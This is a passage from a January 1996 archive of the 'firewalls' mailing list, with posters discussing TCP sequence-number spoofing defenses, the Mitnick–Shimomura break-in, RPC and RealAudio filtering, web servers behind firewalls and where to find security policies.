just doesn't seem right. Just another Big Business scam like CNN and MTV (other, even more off topic posts). I hope that I am wrong about this. An interesting note. Remember when Win95 was in beta and M$ announced a $10,000 reward for information leading to piraters of their betas? What a crock of shit! On our system we had 2 guys who were working together to pirate Win95 and many other software pkgs. over IRC. They were into it big time, getting a dedicated connection (64k), and setting up HUGE pirate ftp sites on their machines. As soon as we knew about it we contacted (well, my bosses did) the FBI, SPA, and M$. We still have not heard from the SPA (this was over a year ago). I guess there was just no getting money off of someone that was not a corporation. M$ looked at the situation, and showed no interest. The FBI looked. We showed them logs of packets, email, etc. The FBI got into the piraters machines and made logs of all of the directories, etc. They had enough evidence to convict. *Then* M$ took a *little* interest, but eventually declined to do a thing about it. Either they really just didn't care about the pirating and the whole reward thing was a farce, or they were just too damn cheap, and didn't want to face the fact that they may actually have to give up $10,000!! They declined any further involvement. The FBI eventually ended up loosing interest as well, and shortly after we realized that no one wanted to do anything, we just cut those accounts off. SPA - Bah! FBI - Bah! M$ - cheap bastard Bah! ---off soap-box now, and putting asbestos on------ Brain21 From firewalls-owner Thu Jan 11 09:51:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA24551 for firewalls-outgoing; Thu, 11 Jan 1996 08:05:50 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA24537 for ; Thu, 11 Jan 1996 08:05:31 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA12024; Thu, 11 Jan 96 11:06:36 EST Date: Thu, 11 Jan 1996 11:06:35 -0500 (EST) From: Scott Barman To: "A. Padgett Peterson, P.E. Information Security" Cc: firewalls@greatcircle.com Subject: Re: Sequence number attacks In-Reply-To: <960111091047.20200f9e@hobbes.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote: > Steve rote: > >A couple of months ago, I did come up with a strong but simple defense > >against sequence number attacks. For details, see > >ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt > > Is easy also to make the first line in your firewall ACL "Deny incoming > ". Belt and suspenders are good 8*). Wouldn't doing this break some MUA's that are looking to connect to their smtp server locally or the system defined as mailhost (which is usually never defined as localhost)? I forgot which MUA off hand, but I remember seeing this as a problem when I specified "Deny ALL" without allowing for some connection to my local system. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Thu Jan 11 10:40:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA26653 for firewalls-outgoing; Thu, 11 Jan 1996 09:31:09 -0800 (PST) Received: from hnc.hnc.com (hnc.hnc.com [206.79.10.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA26646 for ; Thu, 11 Jan 1996 09:30:59 -0800 (PST) Received: (from uucp@localhost) by hnc.hnc.com (8.7.1/8.7.1) id JAA00908 for ; Thu, 11 Jan 1996 09:45:23 -0800 (PST) Received: from serval.hnc.com(206.79.54.2) by hnc.hnc.com via smap (V1.3) id sma000903; Thu Jan 11 09:45:09 1996 Received: from spike.hnc.com (spike.hnc.com [191.9.201.52]) by serval.hnc.com (8.7.1/8.7.1) with ESMTP id JAA23945 for ; Thu, 11 Jan 1996 09:35:13 -0800 (PST) Received: from fred.hnc.com (fred.hnc.com [191.9.204.7]) by spike.hnc.com (8.7.1/8.7.1) with SMTP id JAA02316 for ; Thu, 11 Jan 1996 09:32:30 -0800 (PST) Message-Id: <199601111732.JAA02316@spike.hnc.com> Received: from pcdwl.hnc.com by fred.hnc.com with SMTP (1.38.193.4/16.2) id AA17881; Thu, 11 Jan 1996 09:36:53 -0800 X-Sender: dwl@spike X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 09:32:23 -0800 To: firewalls@greatcircle.com From: David Loysen Subject: Re: Allow SSL through a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:59 PM 1/10/96 CST, you wrote: >Subject: Allow SSL through a firewall? > >I would like to allow access from the Internet to a WWW server that would >have access to our corporate data. Because of the security implications, >I would like that WWW server to be behind a firewall. I have tried to >outline my design below and I would appreciate any comments about >possible problems I may be opening myself up for. > > > ************ ! > client------* Internet *------Firewall---!---WWWserver > ************ ! > Internal > Network > > Maybe lurking around on this list is making me paranoid....... But why not put the WWW server and whatever data you want the world to see outside the firewall. Isn't it cheaper to duplicate the non-secure data outside the firewall than deal with the results of somebody using the WWW server to get to your really important data? "When the going gets weird, the weird turn pro." Hunter S. Thompson, The Curse of Lono. dwl@hnc.com HNC Software Inc. David Loysen 5930 Cornerstone Ct. West (619) 546-8877 x245 San Diego, CA 92121-3728 fax (619) 452-6524 From firewalls-owner Thu Jan 11 10:44:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA27145 for firewalls-outgoing; Thu, 11 Jan 1996 09:55:03 -0800 (PST) Received: from calima (CALIMA.CIAT.CGIAR.ORG [198.93.225.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA27140 for ; Thu, 11 Jan 1996 09:54:48 -0800 (PST) Received: by calima (Smail3.1.29.1 #1) id m0taPKL-00034gC; Thu, 11 Jan 96 12:54 WDT Date: Thu, 11 Jan 1996 12:54:09 -0300 (WDT) From: Juan Carlos Machado X-Sender: juank@calima To: firewalls@greatcircle.com Subject: XTACACS Help Needed Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I install XTACACS in my Sun Sparc running Solaris 2.4. We have a CISCO Access Server and I follow all the instructions in the CISCO. When a Home access user connect to my company, the wtmp file increase in size, but when I try to see it within TACUPD I obtain an error : ERROR: missing utmp & wtmp filenames. Could somebody help me ? Thanks a lot _________________________________________________________ ========================================================= Juan Carlos Machado Z. jmachado@ciat.cgiar.org j.machado@cgnet.com Network Support Voice Ph#: (57-2)4450-691 >>>>>>>>>>>>>>>>>>>>>>>>>> :) <<<<<<<<<<<<<<<<<<<<<<<<<<< CIAT (International Center for Tropical Agriculture) Cali - Valle - Colombia. Phone: 4450000 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ JK:= NOT(reflect(opinions' self,opinions' employer)); From firewalls-owner Thu Jan 11 11:00:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA27372 for firewalls-outgoing; Thu, 11 Jan 1996 10:00:27 -0800 (PST) Received: from sgigate.sgi.com (sgigate.SGI.COM [204.94.209.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA27356 for ; Thu, 11 Jan 1996 10:00:11 -0800 (PST) Received: from sgihub.corp.sgi.com by sgigate.sgi.com via ESMTP (950911.SGI.8.6.12.PATCH825/940406.SGI) id JAA29572; Thu, 11 Jan 1996 09:56:38 -0800 Received: from nowhere.esd.sgi.com by sgihub.corp.sgi.com via ESMTP (950511.SGI.8.6.12.PATCH526/911001.SGI) id JAA12884; Thu, 11 Jan 1996 09:32:14 -0800 Received: from localhost by nowhere.esd.sgi.com via SMTP (940816.SGI.8.6.9/950213.SGI.AUTOCF) id JAA11925; Thu, 11 Jan 1996 09:32:13 -0800 Message-Id: <199601111732.JAA11925@nowhere.esd.sgi.com> From: Ping Huang To: HFDK41A@prodigy.com (MR. JOHN K MOLNAR) cc: firewalls@greatcircle.com Subject: Re: Mergent Gauntlet? In-reply-to: Your message of "Wed, 10 Jan 96 14:05:00 EST." <091.08356360.HFDK41A@prodigy.com> Date: Thu, 11 Jan 96 09:32:13 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk HFDK41A@prodigy.com (MR. JOHN K MOLNAR) wrote: > I got a fax this morning from Mergent, offering to sell me their > Gauntlet Firewall??? > What's a Gauntlet if it's not from TIS? > Or is this the same stuff?? TIS has business relationships with a number of resellers for the Gauntlet product --- perhaps Mergent is one of these resellers. In addition, SGI is an OEM for Gauntlet and sells the SGI port of Gauntlet directly to customers as part of the WebFORCE product line. -- Ping Huang | Voice (415) 933-6256 | FAX (415) 390-6159 Silicon Graphics, Inc., 2011 N Shoreline Blvd. 1L-945, Mt. View CA 94043 Disclaimer: unless explicitly otherwise stated, my statements represent my personal viewpoints only. From firewalls-owner Thu Jan 11 11:01:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA27111 for firewalls-outgoing; Thu, 11 Jan 1996 09:52:28 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA27105 for ; Thu, 11 Jan 1996 09:52:02 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id LAA29133; Thu, 11 Jan 1996 11:50:57 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id LAA17362; Thu, 11 Jan 1996 11:50:56 -0600 Posted-Date: Thu, 11 Jan 1996 11:50:56 -0600 Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST) From: Ron DuFresne To: Brain21 cc: Doug Hughes , firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Brain21 wrote: > On Wed, 10 Jan 1996, Doug Hughes wrote: > > > 2) the spoofing attack had not become common knowledge and widespread use > > until this series of attacks was demonstrated. Papers had been around > > for years on the potential for this, but, as I recall, until this time, > > there weren't any hacker tools that were widely known about for exploiting. > > I agree, but the possibility is always there. If you are in the security > business, then it pays to protect against everything possible, and not to > underestimate your "adversaries." > > > Remember, (Not that this means anything but), the CERT advisory wasn't > > published until 1/23 95 and the attacks took place over Xmas of '94. > > To the best of my recollection, the sequence number randomizing (which > > is MUCH harder to implement than the router rules that prevent spoofing) > > wasn't available until January of '95 either. > > Now, CERT is usually slow about announcing such things, but, the patch > > was relatively simple to implement in a router, so, you'd think that > > not long after they heard about it, it would be posted. Even the sites > > That doesn't necessarily mean anything. I've seen advisories come out > from cert WELL after other advisories have come out on other mailing > lists, with patches and everything. > > > I think my point is that Shimomura should not have underestimated Mitnick > or anyone, especially since he KNEW that it was possible. > Overconfidence? I don't know. Maybe Shimomura didn't even set up the > security there and trusted it? I don't know. I just find it kinda ironic. > > Brain21 > Agreed, either we have here an exterme case of over-confidence, misconfiguring by others really doing the security, or good old Mitnick was 'invited' in a case bordering on entrapment. Seems very strange in either way, seems strange if not an outright blunder. Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Jan 11 11:02:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA27509 for firewalls-outgoing; Thu, 11 Jan 1996 10:11:15 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA27499 for ; Thu, 11 Jan 1996 10:11:11 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA19956; Thu, 11 Jan 1996 13:09:12 -0500 Date: Thu, 11 Jan 1996 13:09:12 -0500 (EST) From: Brain21 To: Frank Willoughby cc: firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG In-Reply-To: <9601110235.AA03286@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since my posting on Mitnick people have fallen into several camps it seems (BTW, my posting was meant to spurr discussion and demonstrate a different outlook on the situation. I do NOT know what the situation was, and that is why it was full of questions. Hopefully I conveyed that, though if I did not it wouldn't be the first time). the camps are: 1) "Conspiracy" - i.e., involvement of the CIA, NSA, or any other organization with initials. (personally, I don't buy this) 2) He was careless with his own system, and overconfident (the scenario I put forth) 3) He did not have control over the security of the system that he was on (something that Frank stated, and that I stated as a possibility as well in a private email to someone else). 4) Lack of security was done on purpose in order to study hacking attempts, etc. My personal opinion is either 2 or 3. Has anyone on the list actually discussed this with him? I would be interested in his side, since we all really only have part of the story. Anyone? Brain21 From firewalls-owner Thu Jan 11 11:05:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA27850 for firewalls-outgoing; Thu, 11 Jan 1996 10:29:32 -0800 (PST) Received: from aspensys (nahro.org [198.77.70.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA27840 for ; Thu, 11 Jan 1996 10:29:16 -0800 (PST) Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA07262; Thu, 11 Jan 1996 13:22:10 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA821396873; Thu, 11 Jan 96 13:27:17 EST Date: Thu, 11 Jan 96 13:27:17 EST From: "Jim Meritt" Message-Id: <9600118213.AA821396873@smtpinet.aspensys.com> To: firewalls@greatcircle.com, Benjamin Allan Smith Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Concur. DISNET yes. Internet no. Unless maybe you/he WANT him arrested.... Or maybe he was just spinning a tale and you fell for it. Or maybe he just didn't understand how it was working. Jim Meritt (LCDR USNR, last active Department of the Navy Information Resources Management, civilian job Department of Defense Intelligence Information Systems division) ______________________________ Reply Separator _________________________________ Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (L Author: Benjamin Allan Smith at SMTPINET Date: 1/11/96 6:53 AM Brain21 wrote: >Hell, my father used >to do top secret work for the Dept. of Defense (he neede "Q" clearance, >and needs higher now) and the office where he worked communicated to it's >other offices over the net. They used netcom. Not too terribly secure >if you ask me. They did not use encryption. I highly doubt that. Every machine that I have seen on base which has Secret (or higher) data is not allowed to have *any* physical connection with the internet (the mjr 100% sure firewall to the internet--cut the wires). Once someone inadvertantly emailed the classified name of a project over a network connected to the Internet. The day was spent completely wiping all of the hard drives on all of the machines that might have received that email (3 complete overwrites with random data if I recall correctly) and then the OS and data were restored from the previous night's backups. A head rolled for that error. So if all that effort was made over a single word, I *highly* doubt that you father used netcom to discuss classified matters. Ben ------------------------------------------------------------------------------- Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88 Science Applications International Corporation Naval Air Warfare Center, Weapons Division, China Lake "...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere. He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie From firewalls-owner Thu Jan 11 12:23:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA29361 for firewalls-outgoing; Thu, 11 Jan 1996 11:47:19 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA29355; Thu, 11 Jan 1996 11:47:11 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 11:47:29 +0100 To: "A. Padgett Peterson, P.E. Information Security" , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Sequence number attacks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 9:10 AM 1/11/96, "A. Padgett Peterson, P.E. Information Security" Steve rote: >>A couple of months ago, I did come up with a strong but simple defense >>against sequence number attacks. For details, see >>ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt > >Is easy also to make the first line in your firewall ACL "Deny incoming >". Belt and suspenders are good 8*). Note that this only keeps the spoofers from masquerading as a machine with one of your IP addresses. If you trust things at other sites, with other IP addresses, the rule Padgett mentions doesn't keep the spoofers from masquerading as those trusted things at other sites. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Thu Jan 11 12:44:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA00486 for firewalls-outgoing; Thu, 11 Jan 1996 12:29:21 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00481 for ; Thu, 11 Jan 1996 12:29:08 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id PAA20093; Thu, 11 Jan 1996 15:27:07 -0500 Date: Thu, 11 Jan 1996 15:27:06 -0500 (EST) From: Brain21 To: Benjamin Allan Smith cc: firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601111046.CAA18112@archimedes.vislab.navy.mil> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > email (3 complete overwrites with random data if I recall correctly) and then I thought that the NSA could read approx. 7 writes deep. If thought that you just put bullets in those drives (quite literally) instead of rewriting them. Brain21 From firewalls-owner Thu Jan 11 12:58:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA29058 for firewalls-outgoing; Thu, 11 Jan 1996 11:32:08 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA29050; Thu, 11 Jan 1996 11:31:59 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 11:32:18 +0100 To: Brian Murrell , Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Firewalls-Digest V5 #14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 9:05 AM 1/11/96, Brian Murrell wrote: >> To make matters worse a lot of UDP applications (most >> notably Sun RPC, and RealAudio) run on arbitrary ports, which >> makes them even harder to sensibly track. A lot of folks are >> comfortable letting UDP port 53 (DNS) into their firewalls. >> DNS is pretty well-known and well-behaved. Not so RPC. > >Some points and questions. Real Audio can be handled by a "stateful packet >filter". Firewall-1 have recently put some filtering rules on their Web site >for FW-1 users to add to their rulebase to allow RealAudio in. I checked just >to make sure they weren't opening the big hole. The datastream does seem to >carry the return port in the clear much like FTP's data connection PORT >command. >It's a little more complicated but the theory is the same. Two problems here. First, not everybody has Firewall-1 filtering systems, or any other stateful filtering system. It's good that those who do can deal with RealAudio, but it doesn't change the fact that the RealAudio protocol is poorly designed, at least from a security point of view. Second, even this only works if all you want are outgoing connections. >I do agree the that unpredictability of RPC application port numbers is a >pain, >but stateful packet filters solve that problem. They watch for the portmapper >traffic to "learn" what services are on what ports. Again, only if all you want to allow are outgoing connections. >However, is the RPC >infrastructure itself without any actual RPC programs insecure?? Does it have >any vulnerabilities in and of itself, or is the nature of RPC and how it maps >ports (somewhat randomly) from a pool that you find insecure?? It's the nature of RPC that makes it difficult to control. You can't easily allow some RPC-based services and disallow others. You can't easily disallow all RPC-based services, even. >Do the actual >applications that use RPC calls have any "extra vulnerabilities" because they >were written with RPCs?? Not that I can think of, other than being difficult to control access to. >Can you point me to any papers on any of the above?? There was a paper written by the folks at Texas A&M a few years ago that addressed insecurities of NIS/YP in particular, and I think (if I recall correctly) also spoke about the problems with RPC in general. It's available from ftp://net.tamu.edu/pub/security/TAMU/NIS_Paper.ps.gz -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Thu Jan 11 13:10:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29660 for firewalls-outgoing; Thu, 11 Jan 1996 12:00:10 -0800 (PST) Received: from ufrmsa1.Olivetti.za (ufrmsa1.Olivetti.za [160.124.2.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA29626 for ; Thu, 11 Jan 1996 11:59:56 -0800 (PST) Received: from andy by ufrmsa1.Olivetti.za with uucp (Smail3.1.29.1 #3) id m0taT95-000IapC; Thu, 11 Jan 96 21:58 GMT+0200 Date: Thu, 11 Jan 1996 09:18:17 -0600 (CST) From: Alan Dowd To: Andrew Cameron Subject: Re: Internet Policy/Security Policy In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Andrew Cameron wrote: > I would like to know where I can find examples of an Internet/Security > Policy for a company. > > I will need to write one in the near future and would like to draw on > the experiance of others. > > Thanks in anticipation > > ----------------------------------------------------------------------------- > > Andrew Cameron > Internet : andrew@andy.alt.za > X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400 > > ---------------------------------------------------------------------------- The best online source for security policies that I've found is: ftp://coast.cs.purdue.edu/pub/doc/policy It includes a lot of academic policies and a selection of various governmental policies and standards. There are also a few Federal examples at: http://www.first.org Query to All: This ("Where can I find policies online?") is a recurring question on Firewalls. I've not chased down the FAQ lately. Has this question yet been added to it? Regards, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- From firewalls-owner Thu Jan 11 13:13:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01000 for firewalls-outgoing; Thu, 11 Jan 1996 12:54:36 -0800 (PST) Received: from legba.fyionline.com (legba.fyionline.com [199.183.15.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00995 for ; Thu, 11 Jan 1996 12:54:29 -0800 (PST) Message-Id: <199601112054.MAA00995@miles.greatcircle.com> Received: from [126.127.127.5] by legba.fyionline.com with SMTP (1.38.193.5/16.2) id AA00843; Thu, 11 Jan 1996 15:53:30 -0500 Received: from fyidevlp.fyionline.com by fyiprod1.fyionline.com with SMTP (1.38.193.5/16.2) id AA24063; Thu, 11 Jan 1996 15:53:13 -0500 Received: by fyidevlp.fyionline.com (1.38.193.5/16.2) id AA10346; Thu, 11 Jan 1996 15:53:28 -0500 From: Cyrus John Subject: Re: Firewalls-Digest V5 #19 To: Firewalls@GreatCircle.COM Date: Thu, 11 Jan 96 15:53:27 EST In-Reply-To: <199601111752.JAA27121@miles.greatcircle.com>; from "firewalls-digest-owner@uunet.uu.net" at Jan 11, 96 9:52 am Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 13 From firewalls-owner Thu Jan 11 13:13:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29927 for firewalls-outgoing; Thu, 11 Jan 1996 12:16:57 -0800 (PST) Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29921 for ; Thu, 11 Jan 1996 12:16:48 -0800 (PST) Received: by chrivb01.cch.com id AA09767; Thu, 11 Jan 96 14:15:45 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma009755; Thu Jan 11 14:15:09 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA8871; Thu, 11 Jan 96 14:16:38 -0600 Message-Id: <9601112016.AA8871@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 4EE5652257255E9D862562AE006EBB82; Thu, 11 Jan 96 14:16:38 To: firewalls From: "Richard Giering Jr." Date: 11 Jan 96 14:12:42 Subject: MSN proxy? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been told that Microsoft has opened access to MSN from the Internet. Does anyone have any technical information on this? FYI - I'm subscribed to the digest and so won't respond right away to a response to the list. Email on the other hand is a different matter. Rick Giering (Webmaster, Postmaster, Firewall Ranger) CCH, Inc. From firewalls-owner Thu Jan 11 13:14:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA00566 for firewalls-outgoing; Thu, 11 Jan 1996 12:32:11 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00548 for ; Thu, 11 Jan 1996 12:31:59 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id PAA20104; Thu, 11 Jan 1996 15:29:56 -0500 Date: Thu, 11 Jan 1996 15:29:56 -0500 (EST) From: Brain21 To: Ng Pheng Siong cc: Frank Willoughby , firewalls@GreatCircle.COM, John Young Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Ng Pheng Siong wrote: > > Shimomura had almost complete packet traces of the break-in, which > allowed him to reconstruct the attack. > > It was a trap. > Personally I can not conclude that from what you have stated. I would hope that he would be logging stuff as a matter of course. How did he KNOW that Mitnick or any one was going to attack his machine specifically? If it were done "to see what happens" then maybe I could buy it, but if it were "a trap for Mitnick" he would have to be psychic as well. Brain21 From firewalls-owner Thu Jan 11 13:29:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29997 for firewalls-outgoing; Thu, 11 Jan 1996 12:18:40 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29986 for ; Thu, 11 Jan 1996 12:18:26 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id PAA20080; Thu, 11 Jan 1996 15:16:17 -0500 Date: Thu, 11 Jan 1996 15:16:17 -0500 (EST) From: Brain21 To: Brett Lymn cc: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601110955.AA27779@bunya.awadi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brett Lymn wrote: > According to Brain21: > > > >Hell, my father used > >to do top secret work for the Dept. of Defense (he neede "Q" clearance, > > > be classified. I bet all the secret documents/matters were not sent > over the net (though I could be wrong....) - it is certainly the way > things work here. > Well, I would hope that that was true, and I would suspect that it was, but my father DID call me once and ask about encryption and keeping his mail from prying eyes. There is always the problem of someone getting careless and sending something or mentioning something over insecure connections by accident when that communication was supposed to be for secured lines of communication. (My Dad was not allowed to give me his email address). Brain21 From firewalls-owner Thu Jan 11 13:48:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29897 for firewalls-outgoing; Thu, 11 Jan 1996 12:14:56 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA29890 for ; Thu, 11 Jan 1996 12:14:52 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA10014 for ; Thu, 11 Jan 1996 14:13:39 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA10010 for ; Thu, 11 Jan 1996 14:13:39 -0600 (CST) Received: from mario.sctc.com (mario.sctc.com [172.17.192.177]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id OAA23479 for ; Thu, 11 Jan 1996 14:14:15 -0600 (CST) Received: (from dowd@localhost) by mario.sctc.com (8.6.12/8.6.9) id OAA04295; Thu, 11 Jan 1996 14:14:13 -0600 Date: Thu, 11 Jan 1996 14:14:13 -0600 (CST) From: Alan Dowd To: firewalls@GreatCircle.COM Subject: Re: Internet Policy/Security Policy (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, Firewallers! Earlier 